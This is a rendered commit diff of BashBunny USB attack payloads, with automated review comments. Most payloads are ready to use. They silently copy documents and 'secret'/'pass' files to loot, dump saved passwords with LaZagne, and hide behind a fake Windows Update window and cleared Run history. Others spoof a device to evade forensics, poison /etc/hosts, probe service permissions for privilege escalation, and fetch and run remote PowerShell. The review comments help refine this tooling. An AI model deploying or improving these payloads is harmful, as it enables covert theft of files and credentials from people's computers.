# Exfiltrate using SmartFileExtract Utility saintcrossbow@gmail.com ### What is SmartFileExtract anyway? SmartFileExtract is a find-and-copy utility written specifically for the Hak5 BashBunny but also is usable as a standalone utility. Files are found by standard patterns (including wildcards) and then copied to any valid path. Additional features: * Find by seeking keywords in any file. * Use “curtains” that show standard progress, no window, or stealthy windows that are either inconspicuous or look just like a regular install window. * Best of all, stop the copy after a specified time or amount in MBs has been copied - or even stop it manually. No longer worry about pulling the BashBunny while in mid-operation. ### Where do I get it? Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract You will only need the SmartFileExtract.exe from the project root. ### So how does it work? SmartFileExtract runs from the command line using three mandatory parameters: the file pattern to find (/file), the drives to seek (/drive), and where to copy the found files (/copyto). There are additional options to make the extract stealthier. The SmartFileExtract documentation explains in detail, and you can also see options by typing `SmartFileExtract /help` ### What is the payload setup to do? I've included the script that I actually use, which works using IMcPwn's ExecutableInstaller: * Options are in e.cmd file * It finds all documents and any filename with the word “secret” or “pass” in it * Found files are copied to loot directory * It will kill the extract after 90 seconds or after 500 MBs are copied.


@ -0,0 +1,26 @@
Method of calling SmartFileExtractor is based on the excellent work of IMcPwn: the ExecutableInstaller.
See the BashBunny Wiki for the original version.
Setup:
- Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract
* Quick tip: you only need the SmartFileExtract.exe from the project root
- Copy SmartFileExtract.exe to the root of the bashubunny
- Change payload.txt:
a) Your file volume name for the bashbunny (if necessary)
b) What kind of device you want the bunny to spoof.
Note: Very much recommend you do this, otherwise will be picked up by forensics
- Change e.cmd:
a) Change your options for Smart File Extract here.
The default payload included in this distribution:
- Looks to Forensics like a Lexar drive (but still called BashBunny)
- Finds all files with a) the word secret or pass in the filename as well as b) any doc files
- Reports status as a fake install window
- Stops extract after 90 seconds or 500 MBs
SmartFileExtract has full documentation on how to use the utility, but if you want to kick the tires and light the fires, run:
smartfileextract /help
Good luck!
Saint Crossbow


@ -4,7 +4,7 @@
# Author: Nutt
# Version: 1.0
# Target: Windows
#
#
#Exfiltrates files from the users Documents folder
#FTP's all files/folders to a specified FTP site named by the victim hostname.
#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
@ -15,13 +15,12 @@
#Red............Failed - Need to work on
#Green..........Finished
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R B
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 1000
LED ATTACK
QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
QUACK ENTER
LED G
LED FINISH


@ -0,0 +1 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


@ -0,0 +1,6 @@
# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\z.cmd')"
LED FINISH


@ -0,0 +1,32 @@
# Simple USB File Extractor
---
- Author: DanTheGoodman
- Creds: thehappydinoa, sebkinne
(I snagged lots of lines from their code)
### Description
---
A stupid easy to use file extractor leveraging the USB storage attack mode. Will stuff the found files in the `/loot/simple-usb-file-extractor` folder. Also deletes the run-line history because why not.
### Dependencies
---
None :)
### Configuration (optional)
---
By default the payload is set to pull all .pdf and .docx files from the Desktop, Downloads, and Documents folders. You can add new items/locations by making new xcopy lines in the x.cmd file.
### Status:
---
|LED|Status|
|---|---|
|Yellow single blink|Running payload|
|Solid Green|Files copied|
---
This is my first payload for the Bash Bunny, and I have finals right now, and I am doing this instead of studying so it's not fancy but I wanted to make something.


@ -0,0 +1,37 @@
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Set the location
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
REM Add more of the line below specifying the location and file type
REM The below example grabs all .pdf files from the user's documents folder
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.docx %dst% >>nul
)
if Exist %USERPROFILE%\Desktop (
xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.docx %dst% >>nul
)
if Exist %USERPROFILE%\Downloads (
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
)
@cls
@exit


@ -0,0 +1,3 @@
@echo off
cscript %~dp0\i.vbs %~dp0\x.cmd
@exit

View File

@ -6,6 +6,14 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
@ -19,11 +27,12 @@ REM /E Copies directories and subdirectories, including empty ones.
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit
@exit


@ -6,12 +6,12 @@
# Target: Windows XP SP3+
# Props: Diggster, IMcPwn
# Category: Exfiltration
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies documents to the loot folder on the Bash Bunny.
#
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"


@ -0,0 +1,72 @@
#CHANGE VARIABLES BELOW
#* Author: Sorsnce
#* Version: Version 1.0
#* Target: Windows 10
#
#Gets the current logged in username
$user = $(Get-WMIObject -class Win32_ComputerSystem | select username).username
#Varaiable you need to change for the script to work.#
######################################################
#Set the following email address you want to send the email too.
$To = "SecurityTeam@yahoo.com"
#Set to the SMTP server for your organization EXAMPLE: smtpserver = "smtp.yahoo.local"
$smtpserver = "smtp.yahoo.local"
#The following trims off the domain in front of the username
#EXAMPLE: $User = Yahoo\John.Smith --> $username = John.Smith
$username = $user.Substring(6)
#Change $username+"" to your email EXAMPLE: $email = $username+"@yahoo.com"
$email = $username+"@yahoo.com"
######################################################
#Gets drive letter for the bashbunny #
$drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'bashbunny' }).name
#Sets variable to drive plus the file location
$Test = $drive + "payloads\switch1\background.bmp"
#Sets variable to test the path to file (background.bmp)
$Switch1 = Test-Path $Test
#Finds what switch bashbunny is set too
if ($Switch1 -eq "True") {$Path = $drive + "payloads\switch1\background.bmp"}
else {$Path = $drive + "payloads\switch2\background.bmp"}
#Sets wallpaper to background.bmp
$setwallpapersrc = @"
using System.Runtime.InteropServices;
public class wallpaper
{
public const int SetDesktopWallpaper = 20;
public const int UpdateIniFile = 0x01;
public const int SendWinIniChange = 0x02;
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
private static extern int SystemParametersInfo (int uAction, int uParam, string lpvParam, int fuWinIni);
public static void SetWallpaper ( string path )
{
SystemParametersInfo( SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange );
}
}
"@
Add-Type -TypeDefinition $setwallpapersrc
[wallpaper]::SetWallpaper($path)
#This sets the subject for the email
$subject = "PC Unlocked for $user"
#This sets the BODY for the email, currently using HTML
$body=@"
<body>
Security Violation!
<p>
$user left his or hers PC Unlocked!<br/>
<p>
</p>
<p>Thanks,</p>
<p></p>
Cyber Security
<p></p>
<p>Sent from my bashbunny.</p>
</body>
"@
#This sends the email with the attributes described above
send-mailmessage -smtpserver $smtpserver -to $To -Subject $subject -from $email -body $body -BodyAsHtml
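Review bot: `$username = $user.Substring(6)` only strips the domain when the domain prefix is exactly five characters plus the backslash, as in the `Yahoo\John.Smith` example; any other domain name produces a wrong sender address, and a value shorter than six characters throws. Splitting on the separator removes that dependency: `$username = $user.Split('\')[-1]`. A smaller point in the same file: `Test-Path` returns a boolean, so `if ($Switch1)` states the intent more directly than comparing with the string `"True"`.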


@ -0,0 +1,23 @@
#!/bin/bash
#
# Title: Blue Team PC Audit
# Author: Sorsnce
# Version: 1.0
# Target: Windows
#
#The PowerShell script changes the users background to "background.bmp", this allows Blue team to remind users to lock their PCs.
#The PowerShell script also sends an email to the Security Team with information about the users PC.
#This allows the Security Team to keep a record of repeatable offenders.
#Executes 1.ps1
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED SETUP
ATTACKMODE HID STORAGE
LED ATTACK
Q GUI r
Q DELAY 1000
Q STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
Q ENTER
LED FINISH
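Review bot: This new payload still obtains `SWITCH_POSITION` with `source bunny_helpers.sh`, while the other payloads touched in this commit drop that line in favour of `GET SWITCH_POSITION`. If the helper script is no longer shipped with current firmware (not visible from this page), `$SWITCH_POSITION` would be empty here and the `1.ps1` path built in the `Q STRING` line would not resolve. For consistency I would replace the comment and the `source bunny_helpers.sh` line with a single `GET SWITCH_POSITION`.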


@ -0,0 +1,29 @@
# Blue Team PC Audit
* Author: Sorsnce
* Version: Version 1.0
* Target: Windows
## Description
The PowerShell script changes the users background to "background.bmp", this allows Blue team to remind users to lock their PCs.
The PowerShell script also sends an email to the Security Team with information about the users PC.
This allows the Security Team to keep a record of repeatable offenders.
## Configuration
Edit 1.ps1 to specify usernames, email addresses, and domain.
You will need to add your background iamge with the name of "background.bmp". This file will be the new background on the PC.
The script will accept other file formats as long as you change the file extension in the powershell script.
Place "background.bmp" in the same directory as your payload, and you should be ready to use the Blue Team PC Audit script.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Magenta | Setup |
| Yellow | Calling the Powershell Script |
| Green | Attack Complete |
## Discussion


@ -4,22 +4,19 @@
# Author: IMcPwn
# Version: 1.0
# Target: Windows 7+
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# using the --startup parameter. Change these settings inside of e.cmd.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
LED SETUP
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
# Green LED for finished
LED G
LED FINISH


@ -19,10 +19,12 @@ LED R 50
#Set ATTACKMODE to HID and Storage to be able to transfer the certificate
ATTACKMODE HID STORAGE
#Import Bunny Helpers
source bunny_helpers.sh
#Start of Script
LED SETUP
GET SWITCH_POSITION
LED ATTACK
#Start of Script
Q DELAY 6000
Q GUI r
Q DELAY 100
@ -39,6 +41,7 @@ Q STRING cd \$absPath
Q ENTER
Q DELAY 500
LED ATTACK
#Set the proxy in the internet settings in the registry (For IE and Chrome).
Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
Q ENTER
@ -62,4 +65,4 @@ Q DELAY 500
Q STRING EXIT
Q ENTER
sync
LED R B 100
LED FINISH


@ -1,60 +0,0 @@
import os
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
IS_RUNNING = True
abspath = os.path.abspath(__file__)
CURR_DIR = os.path.dirname(abspath)
os.chdir(CURR_DIR)
class RequestServer(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200, "ok")
self.send_header('Content-type', 'text/plain')
self.protocol_version = 'HTTP/1.1'
def do_GET(self):
self.send_response(200, "ok")
self.send_header("Content-type", "text/plain")
self.end_headers()
try:
with open(CURR_DIR + self.path, 'r+') as f:
data = f.read()
self.wfile.write(data)
except IOError:
self.send_response(404)
self.wfile.write(CURR_DIR)
return
def do_POST(self):
global IS_RUNNING
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
content_length = int(self.headers['Content-Length'])
filename = self.path[1:]
if filename == 'EOF':
data = self.rfile.read(content_length)
with open(CURR_DIR + "/loot/{}".format(filename), "w+") as f:
f.write(data)
f.close()
self.end_headers()
IS_RUNNING = False
else:
data = self.rfile.read(content_length)
with open(CURR_DIR + "/loot/{}.txt".format(filename), "w+") as f:
f.write(data)
f.close()
self._set_headers()
def run(server_class=HTTPServer, handler_class=RequestServer, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
while IS_RUNNING:
httpd.handle_request()
if __name__ == '__main__':
run()


@ -23,7 +23,7 @@
# Sharing is caring
# Right-Click Ineternet interface click on
# "Properties" and select "Sharing" tab
#
#
# From "Sharing" tab check
# "Allow other netwrk usrs 2 connect... thru dis connection"
# Select the Bash Bunny Gadget and hit "OK"
@ -34,9 +34,11 @@
# Set the IPv4=172.16.64.64 and Subnet=24-bit
# Hit all the OKs
GET SWITCH_POSITION
# Or we could just have the Bash Bunny do all the work...
LED SETUP
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
SWITCHDIR=/root/udisk/payloads/$(SWITCH_POSITION)
# HID Attack Starts
ATTACKMODE HID
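Review bot: `SWITCHDIR=/root/udisk/payloads/$(SWITCH_POSITION)` is a command substitution, so bash tries to run a command named SWITCH_POSITION instead of expanding the variable that `GET SWITCH_POSITION` sets, and SWITCHDIR ends with an empty last component. The rendered page has lost its +/- markers, so I am assuming this is the added line. If so, keep the other form, `SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION` (or `${SWITCH_POSITION}`). The script continues past the hunk, so where SWITCHDIR is used is not visible here.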


@ -0,0 +1,9 @@
# DNS Poisoning Attack Mac
## Description
Redirects a domain to a set IP adres by changing the hosts file.
## Configuration
Change the domain you want to redirect and the IP you want to direct it to.


@ -0,0 +1,23 @@
#Title: DNS Poisoning Mac
#Description: Attacks the host file to redirect a website of your chosing for a given domain
#Author: thehappydinoa
#Target: OS X
LED R 200
ATTACKMODE HID
LED STAGE1
Q DELAY 400
Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 200
Q ENTER
Q DELAY 400
Q STRING 'echo 10.1.1.0 test.com>>/etc/hosts'
Q DELAY 50
Q ENTER
Q STRING exit
Q ENTER
LED FINISH
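Review bot: The header block gives title, description, author and target but does not record what the payload leaves on the host, which the Linux HID POC README in this commit does with its `IOC:` line. The `Q STRING` line appends an entry to /etc/hosts and nothing in the file removes it, so someone testing with this has no record of what to verify or restore afterwards. I would add `#IOC: Terminal opened via Spotlight; line appended to /etc/hosts` and `#Cleanup: remove the appended line from /etc/hosts` to the header. The Startup-Message payload later in this commit has the same gap for the startup.bat it writes to the user's Startup folder.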


@ -0,0 +1,25 @@
# Linux HID poc
Author: Thorsten Sick
Version: 0.9
OS: Linux
Attackmode: HID
IOC: gedit started, file created ('/tmp/owned')
Category: POC
## Description
Uses HID (keyboard) to start an xterm and create the file '/tmp/owned'. After that it starts gedit and writes 'Gotcha'
## Status
|LED|Status|
|-|-|
|SETUP (Magenta solid)|Not much setup needed|
|ATTACK (Yellow single blink)|attack: start xterm and gedit|
|FINISH (Green 1000ms VERYFAST blink followed by SOLID)|Done|


@ -0,0 +1,38 @@
#!/bin/bash
#
# Title: LINUX HID POC
# Description: Payload to test protection technology
# Original Author: Thorsten Sick
# Version: 0.9
# Category: POC
# Target: Linux
# Attackmodes: HID
#
#
# To test detection technolgy a malware-simulator is needed.
# Criteria:
# - one trick pony - no side effects
# - simple to test with (ui and file system markers left)
# - non-destructive/invasive
# "This is the eicar for bash bunny"
#init
LED SETUP
ATTACKMODE HID
# attack
LED ATTACK
RUN UNITY xterm
Q DELAY 1000
Q STRING touch /tmp/owned
Q ENTER
Q STRING exit
Q ENTER
RUN UNITY gedit
Q DELAY 1000
Q STRING Gotcha
# finish
LED FINISH
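Review bot: The header says `# Target: Linux`, but both launches go through `RUN UNITY`, which presumably depends on the Unity desktop, and the typed commands need xterm and gedit to be installed. For a detection test that is judged by the markers it leaves, a run on any other desktop would leave none and could be misread as the protection having blocked it. I would narrow the header to `# Target: Linux (Unity desktop; requires xterm and gedit)` and copy the README's `IOC:` line into the header so the expected markers are stated next to the code. `technolgy` in the comment block should read `technology`.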


@ -0,0 +1,12 @@
# Proof of concepts and malware simulators
The payloads contained in here are to test protection technology.
"The Eicar of BashBunny attacks"
Criteria:
- one trick pony, as simple as possible
- the essence of one attack
- no side effects
- simple to test with (ui and file system markers left by attack)
- non-destructive/invasive

File diff suppressed because one or more lines are too long


@ -1,34 +0,0 @@
#!/bin/bash
#
# Title: RickRoll Prank
# Author: illwill
# Version: 0.1
#
#
# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
# Blue...............Running Powershell / Waiting for WebServer to start
# White..............WebServer started starting the rickroll
# Green..............RickRoll Started, Safe to pull
LED B 200
ATTACKMODE HID
Q GUI r
Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\""
Q DELAY 300
Q ENTER
ATTACKMODE RNDIS_ETHERNET
source bunny_helpers.sh
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
cd $payload_dir
LED R G B 200
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
pid=$!
while ! nc -z localhost 80; do sleep 0.2; done
sleep 3
LED G 200
kill -9 $pid
exit


@ -1,24 +0,0 @@
# RickRoll Prank
* Author: illwill
* Version: Version 0.1
* Target: Windows
## Description
Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Blue (blinking) | Running Powershell / Waiting for WebServer |
| White (blinking) | WebServer started starting the rickroll |
| Green | RickRoll Started, Safe to pull |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40579-payload-rickroll-prank/ "Hak5 Forum Thread")


@ -0,0 +1,30 @@
#!/bin/bash
#Title: Startup-Message
#Author: By MikeeU
#Target: Windows
#Tested on: Windows 10
#Version: 1.0
#Setting up(Magenta)
LED SETUP
ATTACKMODE HID
#Beginning HID Attack(Yellow)
LED ATTACK
#Running cmd to create file in startup directory
RUN WIN cmd
Q STRING "cd C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Q ENTER
Q STRING "echo @echo off > startup.bat"
Q ENTER
Q STRING "echo echo I will lock my PC next time! >> startup.bat"
Q ENTER
Q STRING "echo pause >> startup.bat"
Q ENTER
Q ALT F4
#Fast green followed by Solid -> Finished
LED FINISH


@ -0,0 +1,22 @@
# Startup-Message
by KMikeeU
* Target: Windows
* Tested on: Windows 10
* Should work on: Windows XP, Vista, 7, 8(Desktop), 10
* Version: 1.0
## Description
This little __HID__ Attack, will use cmd to create a file in the startup directory of the logged in user on the target PC. Which will display a message set by the attacker on logging in.
## Configuration
You can edit the script to change the name of the file and the text that will be displayed.
Defaults: startup.bat; I will lock my PC next time!
## Status
| Status | Color | Description |
|------|------|------|
|SETUP|Magenta|Setting Attack mode|
|ATTACK|Slow Yellow|Injecting keystrokes|
|FINISH|Fast Green followed by solid|Payload has finished!|


@ -0,0 +1,23 @@
## Lock PC Prank
* Author: Frater V:I:
* Version: Version 1.0
* Target: Linux, Windows, OSX
## Description
A variation of the Notepad fun payload written by The10FpsGuy and Mrhut10
## Configuration
None
## Status
LED SETUP - detecting OS using get.sh extension
LED ATTACK - launching the payload based on OS detected
LED FAIL3 - No OS detected
LED FINISH - system should be locked and payload is done
## Discussion


@ -0,0 +1,75 @@
#
#
# Title: PC Lock Fun
# Original Authors: The10FpsGuy and Mrhut10
# Big thanks to Mrhut10 for helping to put a loop in it :D
# Modified: FraterVI
# Category: Fun
# Target:.           Windows, Linux, Mac
# Description: Takes original prank payload and adds OS detection so
# it can be run on any(mostly any) OS.
#
#options
LED SETUP
TARGET_OS="UNKNOWN"
ATTACKMODE RNDIS_ETHERNET
sleep 3
GET TARGET_IP
if [ -z "${TARGET_IP}" ]; then
echo "No Target IP" > /dev/null
ATTACKMODE ECM_ETHERNET
sleep 3
GET TARGET_IP
if [ -z "${TARGET_IP}" ]; then
LED FAIL3
exit 1
fi
fi
GET TARGET_OS
msg_header="begining"
msg_body="I will learn to lock my computer"
msg_body_repeats=50
msg_end="Please remember to lock your computer when you walk away."
LED ATTACK
Q DELAY 500
case "$TARGET_OS" in
"LINUX") ATTACKMODE HID
RUN UNITY gedit
;;
"MACOS") ATTACKMODE HID VID_0x05AC PID_0x021E
RUN OSX terminal
;;
"WINDOWS") ATTACKMODE HID
RUN WIN notepad.exe
;;
"UNKNOWN") LED FAIL3
exit 1
;;
esac
Q DELAY 1000
Q STRING $msg_header
Q ENTER
for (( i=1; i<=$msg_body_repeats; i++ ))
do
Q STRING $msg_body
Q ENTER
done
Q STRING $msg_end
Q ENTER
case "$TARGET_OS" in
"LINUX") Q GUI l
;;
"MACOS") Q STRING "/System/Library/CoreServices/Menu\ Extras/User.menu/Contents/Resources/CGSession -suspend"
Q ENTER
;;
"WINDOWS") Q GUI l
;;
"UNKNOWN") LED FAIL3
exit 1
;;
esac
LED FINISH
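Review bot: Both `case "$TARGET_OS"` blocks list `"UNKNOWN"` explicitly but have no `*)` arm, so any other value returned by `GET TARGET_OS`, including an empty one, matches nothing and the script runs on to `LED FINISH` as if it had succeeded. In the first case, replace the `"UNKNOWN")` arm with `*) LED FAIL3; exit 1 ;;`. The failure arm in the second case can then be dropped, since the first case has already exited for every unsupported value. The `begining` value of `msg_header` is also misspelled.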


@ -1,25 +1,26 @@
pid=$$
touch /tmp/$pid
cd /tmp/
for (( i=0; i < 5; ++i ))
do
if [ ! -e /tmp/1.jpg ]; then
wget "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg" -O "/tmp/1.jpg";
curl -0 1.jpg "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg";
fi
if [ ! -e /tmp/2.jpg ]; then
wget "http://wallpapersafari.com/download/rzbCmJ/" -O "/tmp/2.jpg";
curl -0 2.jpg "http://wallpapersafari.com/download/rzbCmJ/";
fi
if [ ! -e /tmp/3.jpg ]; then
wget "https://images3.alphacoders.com/152/152507.jpg" -O "/tmp/3.jpg";
curl -0 3.jpg "https://images3.alphacoders.com/152/152507.jpg";
fi
if [ ! -e /tmp/4.jpg ]; then
wget "https://images3.alphacoders.com/152/152475.jpg" -O "/tmp/4.jpg";
curl -0 4.jpg "https://images3.alphacoders.com/152/152475.jpg";
fi
if [ ! -e /tmp/5.jpg ]; then
wget "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png" -O "/tmp/5.jpg";
curl -0 5.jpg "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png";
fi
let number="$RANDOM % 5 + 1 | bc"
@ -31,7 +32,7 @@ do
killall Dock
let time="$RANDOM % 18000 + 2700 | bc"
echo $time
sleep $time
sleep $time
done
rm /tmp/1.jpg /tmp/2.jpg /tmp/3.jpg /tmp/4.jpg /tmp/5.jpg /tmp/$pid
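Review bot: The `curl -0 1.jpg "http://…"` lines pass `-0` (digit zero), which is curl's HTTP/1.0 switch rather than an output option, so `1.jpg` is treated as a second URL and nothing is written to `/tmp/1.jpg`. The `[ ! -e /tmp/N.jpg ]` guards therefore stay true and every pass of the loop downloads again. The page has lost its +/- markers, so I am assuming the curl lines are the added side. If so, each should name its output file, e.g. `curl -o /tmp/1.jpg "URL"`, and likewise for 2.jpg to 5.jpg. The loop body between the two hunks is not visible here.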


@ -13,7 +13,7 @@ LOOTDIR='/root/udisk/loot/win93'
# Script section, do not modify after that line
LED SETUP
mkdir -p $LOOTDIR
echo "Starting win93 prank" > $LOOTDIR/win93.log
echo "Starting win93 prank: " > $LOOTDIR/win93.log
DEFAULT=0
LED STAGE1
@ -21,7 +21,7 @@ ATTACKMODE ECM_ETHERNET
sleep 3
GET TARGET_IP
if [ -z "${TARGET_IP}" ]; then
echo "No target IP, checking if it's a windows host" >> $LOOTDIR/win93.log
echo "No target IP, checking if it's a windows host: " >> $LOOTDIR/win93.log
DEFAULT_OS='WIN'
LED SPECIAL
ATTACKMODE RNDIS_ETHERNET
@ -78,15 +78,14 @@ if [ "$OS" = "MAC" ]; then
RUN OSX "terminal"
QUACK STRING "open \"http://www.windows93.net\" && osascript -e \"sleep 3;ccf;\";"
elif [ "$OS" = "LINUX" ]; then
DUCKY_LANG fr
RUN UNITY "xterm"
QUACK STRING "chromium-browser --start-fullscreen --incognito --new-window http://www.windows93.net &; exit;"
QUACK ENTER
RUN LINUX "xdg-open http://www.windows93.net"
QUACK DELAY 1000
QUACK F11
elif [ "$OS" = "WIN" ]; then
LED FAIL
echo "Payload not supported on windows for now, exiting" >> $LOOTDIR/win93.log
RUN WIN "cmd /c start http://www.windows93.net"
QUACK DELAY 1000
QUACK F11
exit 1
fi
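Review bot: In the `"$OS" = "WIN"` branch the trailing `exit 1` still follows `RUN WIN "cmd /c start http://www.windows93.net"`, `QUACK DELAY 1000` and `QUACK F11`, so a run that completed its work exits with a failure status and skips anything after the `fi`. The page has lost its +/- markers, so I am assuming the `RUN WIN` lines are the added side and that `LED FAIL` and the "not supported" log line were removed. If so, drop `exit 1` from this branch, or move the failure handling into an `else` arm for unrecognised `$OS` values. The if/elif chain begins before the hunk.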


@ -0,0 +1,8 @@
$drive = (gwmi win32_volume -f 'label="BashBunny"' | Select-Object -ExpandProperty DriveLetter)
ForEach ($item in (wmic service list full | Select-String -Pattern "PathName" | Select-String -Pattern "system32")) {
$file = $item.ToString($item)
icacls.exe $file.Split("=")[1].split(' ')[0] | Out-File -Append $drive\\loot\\GetServicePerm\\\$env:computername.txt
}
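Review bot: The script has no header comment, while the payload files in this commit state title, author and target. What it writes is not obvious from the code: the icacls output for each service executable whose path mentions system32, appended to a per-computer text file under loot\GetServicePerm on the BashBunny volume. I would open the file with `# Collects icacls output for service executables under system32` and `# Output: <BashBunny>\loot\GetServicePerm\<COMPUTERNAME>.txt`. `$item.ToString($item)` also reads oddly; if it only converts the match to a string, a short comment saying so would help.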


@ -0,0 +1,33 @@
#!/bin/bash
#
# Title: GetServicePerm
# Author: Resheph @ www.postexplo.com
# Version: 0.1
# Target: Microsoft Windows hosts supporting PowerShell
# Category: Recon
#
# Description:
# When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
# This is useful when a service is executed with elevated privileges but is modifiable by everyone.
# When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
#
# init
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LOOTDIR=/root/udisk/loot/GetServicePerm
mkdir -p $LOOTDIR
# Do Recon
LED SETUP
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING powerShell -windowstyle hidden -ExecutionPolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetServicePerm.ps1')"
Q ENTER
# Done
sync;sleep 1;sync
LED FINISH


@ -0,0 +1,25 @@
# GetServicePerm
* Title: GetServicePerm
* Author: Resheph @ www.postexplo.com
* Version: 0.1
* Target: Microsoft Windows hosts supporting PowerShell
* Category: Recon
## Description
When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
This is useful when a service is executed with elevated privileges but is modifiable by everyone.
When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
## Configuration
The only thing you will need to change is the Ducky language so it matches the target.
## STATUS
LED SETUP
LED FINISH
## Discussion


@ -1,8 +1,9 @@
# Shows details of currently running PC
